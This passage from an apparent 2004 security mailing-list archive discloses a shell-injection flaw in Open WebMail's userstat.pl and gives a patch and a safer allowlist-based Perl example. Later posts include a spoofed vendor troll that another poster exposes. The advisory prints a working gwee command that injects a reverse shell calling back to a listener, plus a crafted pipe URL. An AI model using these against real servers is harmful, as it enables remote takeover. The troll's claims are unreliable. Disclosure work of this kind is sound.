from Ernie Miller. Open WebMail is designed to manage very large mail
folder files in a memory efficient way. It also provides a range of
features to help users migrate smoothly from Microsoft Outlook to
Open WebMail.
-- http://openwebmail.org

VULNERABILITY

Nullbyte and Syscalls discovered that a near-obsolete script named
userstat.pl shipped with Open Webmail 2.20, 2.21 and 2.30 doesn't
filter out dangerous *nix shell characters from the loginname
parameter. The loginname parameter is used as an argument when
executing openwebmail-tool.pl from the vulnerable script. By adding a
";", "|" or "( )" followed by the shell command to an HTTP GET, HEAD
or POST request, an attacker can execute arbitrary system commands as
an unprivileged user (the Apache user, e.g. "nobody" or "www").

DISCOVERY

The vulnerability was found by Nullbyte and Syscalls of UDC.

EXPLOIT

At least 2 exploits are in circulation, one by Nullbyte and one re-write by
Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30 5.8MB) is
limited (read the FIX section below). You can use Gwee (generic web
exploitation engine) available from http://cycom.se/dl/gwee to exploit using
the following command:

$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl

-L  Use built-in TCP listener (like nc -l).
-l  The host or IP address to have the reverse shellcode connect
back to.
-p  The port to have the reverse shellcode connect back to.

For example...

$ gwee -y'loginname=%3B' -l localhost -p12345 -Lf localhost/userstat.cgi

!!!
 `  ___  '
-  (0 0)  -
- -oOo(_)oOo - --- -- -  -
gwee 1.21 - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren [EMAIL PROTECTED]
Perl and Python shellcode by Sabu [EMAIL PROTECTED]
Acknowledgements: Sabu and Nullbyte

[i] target: localhost
[i] using POST requests to send data
[i] shellcode: Sabu's reverse Perl shellcode (portable)
[i] injection method: perl -e
[+] resolving localhost into an ip address
[i] shellcode will connect to 127.0.0.1 on port 12345
[i] will listen for incoming connection on port 12345
[+] attempting to inject shellcode into target
[+] listening for incoming connection on port 12345, timeout is 30 seconds
[i] got connection from 127.0.0.1:33670
Linux luserland 2.4.22-openmosix-1 #1 Thu Mar 18 09:55:31 CET 2004 i686 unknown
 12:05:52 up  3:56,  7 users,  load average: 0.08, 0.02, 0.01


FIX

Cycom AB has provided a diff patch that will fix the issue. Ken Girrard
kgirrard.AT.users.sourceforge.net wrote and published an advisory long
before this one. He provided a patch with his advisory which results in
userstat.pl still being vulnerable to remote arbitrary command execution, this
patch is applied to (shipped with) openwebmail-current.tgz released 2004-04-30
(5.8MB).

Girrard's patch doesn't filter out | (pipes) and /, but does filter out
spaces and tabs, which makes it impossible to pass arguments to commands an
attacker would want to execute. Nevertheless, it's still possible to execute
commands without arguments. An example of such an attack would be an attacker
that has write access to the box using e.g. FTP and uploads a reverse
shellcode, marks it executable and enters the absolute path to it in a crafted
URL like this one for example:

http://target/cgi-bin/openwebmail/userstat.pl?loginname=%7C/home/fu/bar

Our patch follows...

- --snip--

- --- userstat.pl.orig2004-02-20 14:58:06.0 +0100
+++ userstat.pl 2004-02-21 18:05:16.0 +0100
@@ -52,6 +52,9 @@
 my $html=qq|a href=_URL_ target=_blank style=text-decoration: none|.
  qq|font color=_COLOR__TEXT_/font/a|;
 
+# filter out dangerous characters
+$user =~ s/[\/\\'\`\|\(\)\[\]\{\}\$\s;]//g;
+
 if ($user ne ) {
my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
if ($status =~ /has no mail/) {
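Review bot: the substitution added at `+$user =~ s/[\/\\'\`\|\(\)\[\]\{\}\$\s;]//g;` is a deny-list applied immediately before `$user` is interpolated into a backtick shell command (`my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;` in the context lines below), so any shell-significant byte the character class omits still reaches the shell unchanged. The more robust one-line change is an allow-list that accepts only what a login name may contain and otherwise bails out, e.g. `return unless $user =~ /^[a-z0-9_.-]+\z/i;`, or, better still, invoking openwebmail-tool.pl through the list form of `open`/`system` so `$user` is passed as a single argv element and no shell is involved at all; a short comment naming the threat (shell metacharacters in loginname) would also help the next reader more than "filter out dangerous characters".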

- --snip--

Enter cgi-bin/openwebmail/ and run:
$ patch -i owm.patch
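The two patches above both try to make a user-supplied login name safe to interpolate into a shell command by removing characters from it. The defensive alternative that the discussion points at is to validate the name against an allowlist and to run the helper without a shell. The following is an added example written for this page, not code from OpenWebMail or from either advisory; the helper path in `$tool` and the login-name character set are assumptions.

```perl
#!/usr/bin/perl
# Added example (not OpenWebMail code): validate the loginname with an
# allowlist and invoke the helper without a shell, instead of stripping a
# deny-list of characters and interpolating the result into backticks.
use strict;
use warnings;

# Assumed helper path; in OpenWebMail this is $ow_cgidir/openwebmail-tool.pl.
my $tool = '/usr/local/www/cgi-bin/openwebmail/openwebmail-tool.pl';

# Allowlist: accept only characters a local login name can contain
# (assumed set: lowercase letter or underscore first, then letters, digits,
# underscore, dot or dash, at most 32 characters). Returns the validated
# name, or undef when the input is rejected.
sub valid_loginname {
    my ($user) = @_;
    return undef unless defined $user;
    return undef unless $user =~ /\A[a-z_][a-z0-9_.-]{0,31}\z/;
    return $user;
}

# Run the status check with the list form of open(), which bypasses /bin/sh
# entirely: each element is passed as a single argv entry, so no character
# in $user can terminate the command or start another one.
sub user_status {
    my ($user) = @_;
    my $name = valid_loginname($user);
    return 'invalid loginname' unless defined $name;
    open(my $fh, '-|', $tool, '-m', '-e', $name)
        or return "cannot run tool: $!";
    local $/;                 # slurp the whole output
    my $status = <$fh>;
    close $fh;
    return defined $status ? $status : '';
}

# Constructed sample inputs: two well-formed names and four that carry
# characters no login name should contain. Only the validator is exercised
# here so that the example runs offline without the helper installed.
for my $u ('alice', 'bob.smith', 'eve|id', 'x;y', '../../etc', '') {
    my $v = valid_loginname($u);
    printf "%-12s -> %s\n", "'$u'", defined $v ? 'accepted' : 'rejected';
}
```

The point of the list-form `open` is that the argument vector goes straight to `execvp`, so the question of which metacharacters a filter forgot never arises; the allowlist is then only a sanity check on the name itself, and a rejected request is answered with an error rather than being silently rewritten into a different user's name.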


ACKNOWLEDGMENTS

I would like to thank the following people:
Sabu, Nullbyte and Syscalls.

ABOUT CYCOM AB

Cycom AB is a newly started firm specializing in information security
services (penetration testing, risk assessment, source code review,
disaster/incident management and 

Re: [Full-Disclosure] KDE was hacked

2004-05-09 Thread Richard Johnson
If you had been subscribed to our iAlert services, you would have known
about this specific hacker threat months in advance, and known that only
the binary releases of KDE are safe to use.

As an agent of a commercial intelligence agency, I cannot stress how 
important it is for all commercial entities to subscribe to commercial 
intelligence services.

We know about hacking before it happens! 


On Fri, May 07, 2004 at 10:48:06PM +0400, Alexander wrote:
 2004/05/03 13:50:28 KDE was hacked by Russian hacker
 
 More information (In Russian)
  
 http://www.securitylab.ru/45100.html
 
 
 Diff for /kdenetwork/kppp/connect.cpp between version 1.175 and 1.176:
 
 http://webcvs.kde.org/cgi-bin/cvsweb.cgi/kdenetwork/kppp/connect.cpp.diff?r1
 =1.175r2=1.176f=h
 
 
 

-- 
Richard Johnson, CISSP
Senior Security Researcher
iDEFENSE Inc.
[EMAIL PROTECTED]

Get paid for security stuff!!
http://www.idefense.com/contributor.html

and become part of our research team!
http://idefense.bugtraq.org/



[Full-Disclosure] Windows IPS personal use

2004-05-09 Thread n30
Guys,

Looking for a intrusion prevention system for personal use on my win xp box

Thanks in advance
-Kartik



Re: [Full-Disclosure] KDE was hacked

2004-05-09 Thread Jason Coombs
Aloha, Richard.

I'm comfortable with "I told you so." and have used it at times myself.

There may be something wrong with "I could have told you so, if you had 
paid me."

Secrets for dollars will always exist, but shouldn't we just do it and 
shut up about it rather than try to make it seem like a reasonable 
business practice?

 We know about hacking before it happens!

Then you are complicit and should be prosecuted.

Sincerely,

Jason Coombs
[EMAIL PROTECTED]
Richard Johnson wrote:

If you had been subscribed to our iAlert services, you would have known
about this specific hacker threat months in advance, and known that only
the binary releases of KDE are safe to use.
As an agent of a commercial intelligence agency, I cannot stress how 
important it is for all commercial entities to subscribe to commercial 
intelligence services.

We know about hacking before it happens! 




Re: [Full-Disclosure] KDE was hacked

2004-05-09 Thread Kurt Seifried
Please note that this is yet another troll:

Received: from securityfocus.bugtraq.org ([199.173.12.66])
 by netsys.com (8.11.6p2-2003-09-16/8.11.6) with SMTP id i4A0od422402
 for [EMAIL PROTECTED]; Sun, 9 May 2004 20:50:46 -0400
(EDT)

A hint: email from iDEFENSE employees typically comes from machines with
reverse and forward DNS in the idefense.com DNS zone (funny how it works
that way).

While I don't mind spoofed posts, these are getting very lame.

Kurt Seifried, [EMAIL PROTECTED]
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/


- Original Message - 
From: Richard Johnson [EMAIL PROTECTED]
To: Alexander [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Sunday, May 09, 2004 19:41
Subject: Re: [Full-Disclosure] KDE was hacked


 If you had been subscribed to our iAlert services, you would have known
 about this specific hacker threat months in advance, and known that only
 the binary releases of KDE are safe to use.

 As an agent of a commercial intelligence agency, I cannot stress how
 important it is for all commercial entities to subscribe to commercial
 intelligence services.

 We know about hacking before it happens!


 On Fri, May 07, 2004 at 10:48:06PM +0400, Alexander wrote:
  2004/05/03 13:50:28 KDE was hacked by Russian hacker
 
  More information (In Russian)
 
  http://www.securitylab.ru/45100.html
 
 
  Diff for /kdenetwork/kppp/connect.cpp between version 1.175 and 1.176:
 
 
http://webcvs.kde.org/cgi-bin/cvsweb.cgi/kdenetwork/kppp/connect.cpp.diff?r1
  =1.175r2=1.176f=h
 
 
 

 -- 
 Richard Johnson, CISSP
 Senior Security Researcher
 iDEFENSE Inc.
 [EMAIL PROTECTED]

 Get paid for security stuff!!
 http://www.idefense.com/contributor.html

 and become part of our research team!
 http://idefense.bugtraq.org/





RE: [Full-Disclosure] Victory day - Sasser surrenders

2004-05-09 Thread Aditya, ALD [Aditya Lalit Deshmukh]

 You're kidding there, right?

no the person who made the statement below actually oversaw all the details of the 
transfer!


 And a few months ago, a large amount of money was transferred to his
 account from a couple of popular antivirus vendors :)



Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)



[Full-Disclosure] Administrivreality: Please register email addresses

2004-05-09 Thread Len Rose

I'd like to ask everyone who continues to post without
registering, or who posts from an unregistered address, to
please register. 

You are causing needless work for John and me, and you 
are obviously introducing delays in your messages, since we
have to manually approve them. 

We are forced to block posts from non-registered members 
in an attempt to stop spam, etc. so everything hits the
moderation queue.


We do make an attempt to cover the list 24x7 but there 
are many times when we're both occupied with real work.

You may not be aware that you can add multiple addresses
and turn off mail delivery to any or all of them, depending on
what you require, while still being permitted to post at will.

Thanks

Len

